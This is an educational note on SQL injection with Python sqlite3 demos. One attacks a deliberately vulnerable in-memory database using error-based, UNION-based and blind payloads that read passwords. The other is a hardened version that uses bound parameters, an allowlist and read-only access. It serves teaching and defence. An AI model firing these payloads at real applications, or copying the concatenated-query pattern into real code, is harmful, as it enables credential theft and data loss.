SQL injection

Structured Query Language (SQL) is the standard language for working with relational database management systems (RDBMS). It is a textual language: the application assembles a statement as a string and sends it to the database server, which parses and executes it.

SQL injection is an attack that takes advantage of unvalidated input: when an application builds a query by concatenating user-supplied text into the SQL string, an attacker can craft input that changes the structure of the statement and so injects their own SQL commands through the web application.

SQL injection attacks the database (server side); cross-site scripting (XSS) attacks the user's browser (client side).


Types:
Error-based: send the database deliberately malformed queries; the error messages returned to the page often reveal valuable information (the DBMS in use, the shape of the query, table and column names).
Union-based: UNION combines the results of two or more SELECT statements, so the attacker's SELECT against another table (e.g. users) is returned alongside the page's normal results; the column count and types of the two SELECTs must match.
Blind: the page shows neither data nor errors, only a true/false difference in behaviour (different content, or a time delay), from which the attacker extracts data one condition at a time.
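The three types, worked against a deliberately vulnerable lookup function. This is an added example and not code from the original notes; it uses Python's sqlite3 module with a constructed in-memory database (tables users and products, made-up rows), and the function names vulnerable_search, error_probe, union_dump and blind_extract are the example's own. The vulnerable part is the one line that concatenates the user's input into the SQL text; everything else is the attacker driving it.

```python
import sqlite3
import string


def make_db():
    """Build a small in-memory database with constructed sample data (not from any real system)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users (username, password) VALUES (?, ?)",
                     [("alice", "Wonderland!"), ("bob", "hunter2")])
    conn.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, price REAL)")
    conn.executemany("INSERT INTO products (name, price) VALUES (?, ?)",
                     [("keyboard", 49.0), ("mouse", 19.5)])
    conn.commit()
    return conn


def vulnerable_search(conn, name):
    """Deliberately vulnerable: user input is concatenated straight into the SQL text,
    so the database cannot tell where the data ends and the attacker's SQL begins."""
    sql = "SELECT name, price FROM products WHERE name = '" + name + "'"
    return conn.execute(sql).fetchall()


def error_probe(conn, payload):
    """Error-based: a stray quote breaks the statement. If the application echoes the
    database error to the page, the attacker learns the DBMS type and the query shape.
    Returns the error text, or None when the payload did not break the query."""
    try:
        vulnerable_search(conn, payload)
        return None
    except sqlite3.Error as exc:
        return str(exc)


def union_dump(conn):
    """Union-based: close the string literal, append a SELECT with the same number of
    columns against another table, and comment out the application's trailing quote."""
    payload = "x' UNION SELECT username, password FROM users --"
    return vulnerable_search(conn, payload)


def blind_extract(conn, username, max_len=32):
    """Blind (boolean-based): nothing is echoed except whether the page returned rows.
    Each query tests one character of the password: a true condition makes the WHERE
    clause match every product, a false one matches nothing.
    Assumption for the demo: the password contains no single quote."""
    charset = string.ascii_letters + string.digits + string.punctuation.replace("'", "")
    found = ""
    for pos in range(1, max_len + 1):
        for c in charset:
            payload = (f"x' OR (SELECT substr(password, {pos}, 1) FROM users "
                       f"WHERE username = '{username}') = '{c}' --")
            if vulnerable_search(conn, payload):  # non-empty result == condition true
                found += c
                break
        else:
            break  # no character matched: we have read past the end of the string
    return found


if __name__ == "__main__":
    db = make_db()
    print("error-based :", error_probe(db, "keyboard'"))
    print("union-based :", union_dump(db))
    print("blind       :", blind_extract(db, "alice"))
```

The blind extraction needs roughly one request per candidate character per position, which is why blind injection is slow but still fully effective: the attacker never sees the password on the page, only whether each guess produced rows.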

The claim that stored procedures prevent SQL injection is wrong. A procedure that builds dynamic SQL by concatenating its arguments into a string and executing it (EXEC in T-SQL, EXECUTE IMMEDIATE in PL/SQL) is just as injectable as application code that does the same; what prevents injection is keeping data separate from code with parameterised queries (bound variables), whether the statement lives in the application or in a procedure.

The attacker's first step is to find web applications that are vulnerable. Attacks usually take advantage of poorly written code and poor web site administration. To prevent these attacks, consider: using parameterised queries so that user input is never interpreted as SQL; validating input and removing or rejecting dangerous characters and sequences (a secondary defence only, since such filters are routinely bypassed); minimising the privileges of the database account the application uses; implementing consistent coding standards; and firewalling the SQL server so that only the application tier can reach it.
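The hardened counterpart to a string-concatenated lookup, as an added example that is not part of the original notes. It again uses Python's sqlite3 module and constructed sample data; the names ALLOWED_SORT, restrict_to_read_only, search_products and attempt_write are the example's own. It shows three of the measures above in code: a bound parameter for the value, an allowlist for the identifier (a sort column, which cannot be passed as a parameter), and a read-only connection standing in for a least-privilege database account.

```python
import sqlite3

# Allowlist mapping user-visible sort keys to real column names. Identifiers (columns,
# tables, ORDER BY direction) cannot be bound as parameters, so anything of that kind
# that comes from the user must be looked up here rather than interpolated.
ALLOWED_SORT = {"name": "name", "price": "price"}


def make_db():
    """Constructed sample data for the example (not from any real system)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users (username, password) VALUES (?, ?)",
                     [("alice", "Wonderland!"), ("bob", "hunter2")])
    conn.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, price REAL)")
    conn.executemany("INSERT INTO products (name, price) VALUES (?, ?)",
                     [("keyboard", 49.0), ("mouse", 19.5)])
    conn.commit()
    return conn


def restrict_to_read_only(conn):
    """Least privilege for the web tier: this connection may only read.
    In a real deployment this is a database account without INSERT/UPDATE/DELETE/DDL
    rights; SQLite has no accounts, so PRAGMA query_only stands in for it here."""
    conn.execute("PRAGMA query_only = 1")
    return conn


def search_products(conn, name, sort="name"):
    """Hardened lookup. The value travels as a bound parameter (?), so the driver hands
    it to the engine as data and it can never change the statement's structure. The
    identifier comes from the allowlist; unknown keys are rejected, not interpolated."""
    try:
        column = ALLOWED_SORT[sort]
    except KeyError:
        raise ValueError(f"unsupported sort column: {sort!r}")
    sql = f"SELECT name, price FROM products WHERE name = ? ORDER BY {column}"
    return conn.execute(sql, (name,)).fetchall()


def attempt_write(conn, sql):
    """Return None if the write succeeded, otherwise the database's refusal message."""
    try:
        conn.execute(sql)
        return None
    except sqlite3.Error as exc:
        return str(exc)


if __name__ == "__main__":
    db = restrict_to_read_only(make_db())
    union = "x' UNION SELECT username, password FROM users --"
    print("parameterised :", search_products(db, union))       # [] : the payload is just a name that matches nothing
    print("normal lookup :", search_products(db, "keyboard"))  # [('keyboard', 49.0)]
    try:
        search_products(db, "keyboard", sort="price; DROP TABLE users")
    except ValueError as exc:
        print("allowlist     :", exc)
    print("read-only     :", attempt_write(db, "DROP TABLE users"))
```

Note that the parameterised version does not escape or strip anything from the input: the UNION payload is simply compared, quotes and all, against the name column and matches no row. That is the difference between removing "culprit characters" and separating code from data.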

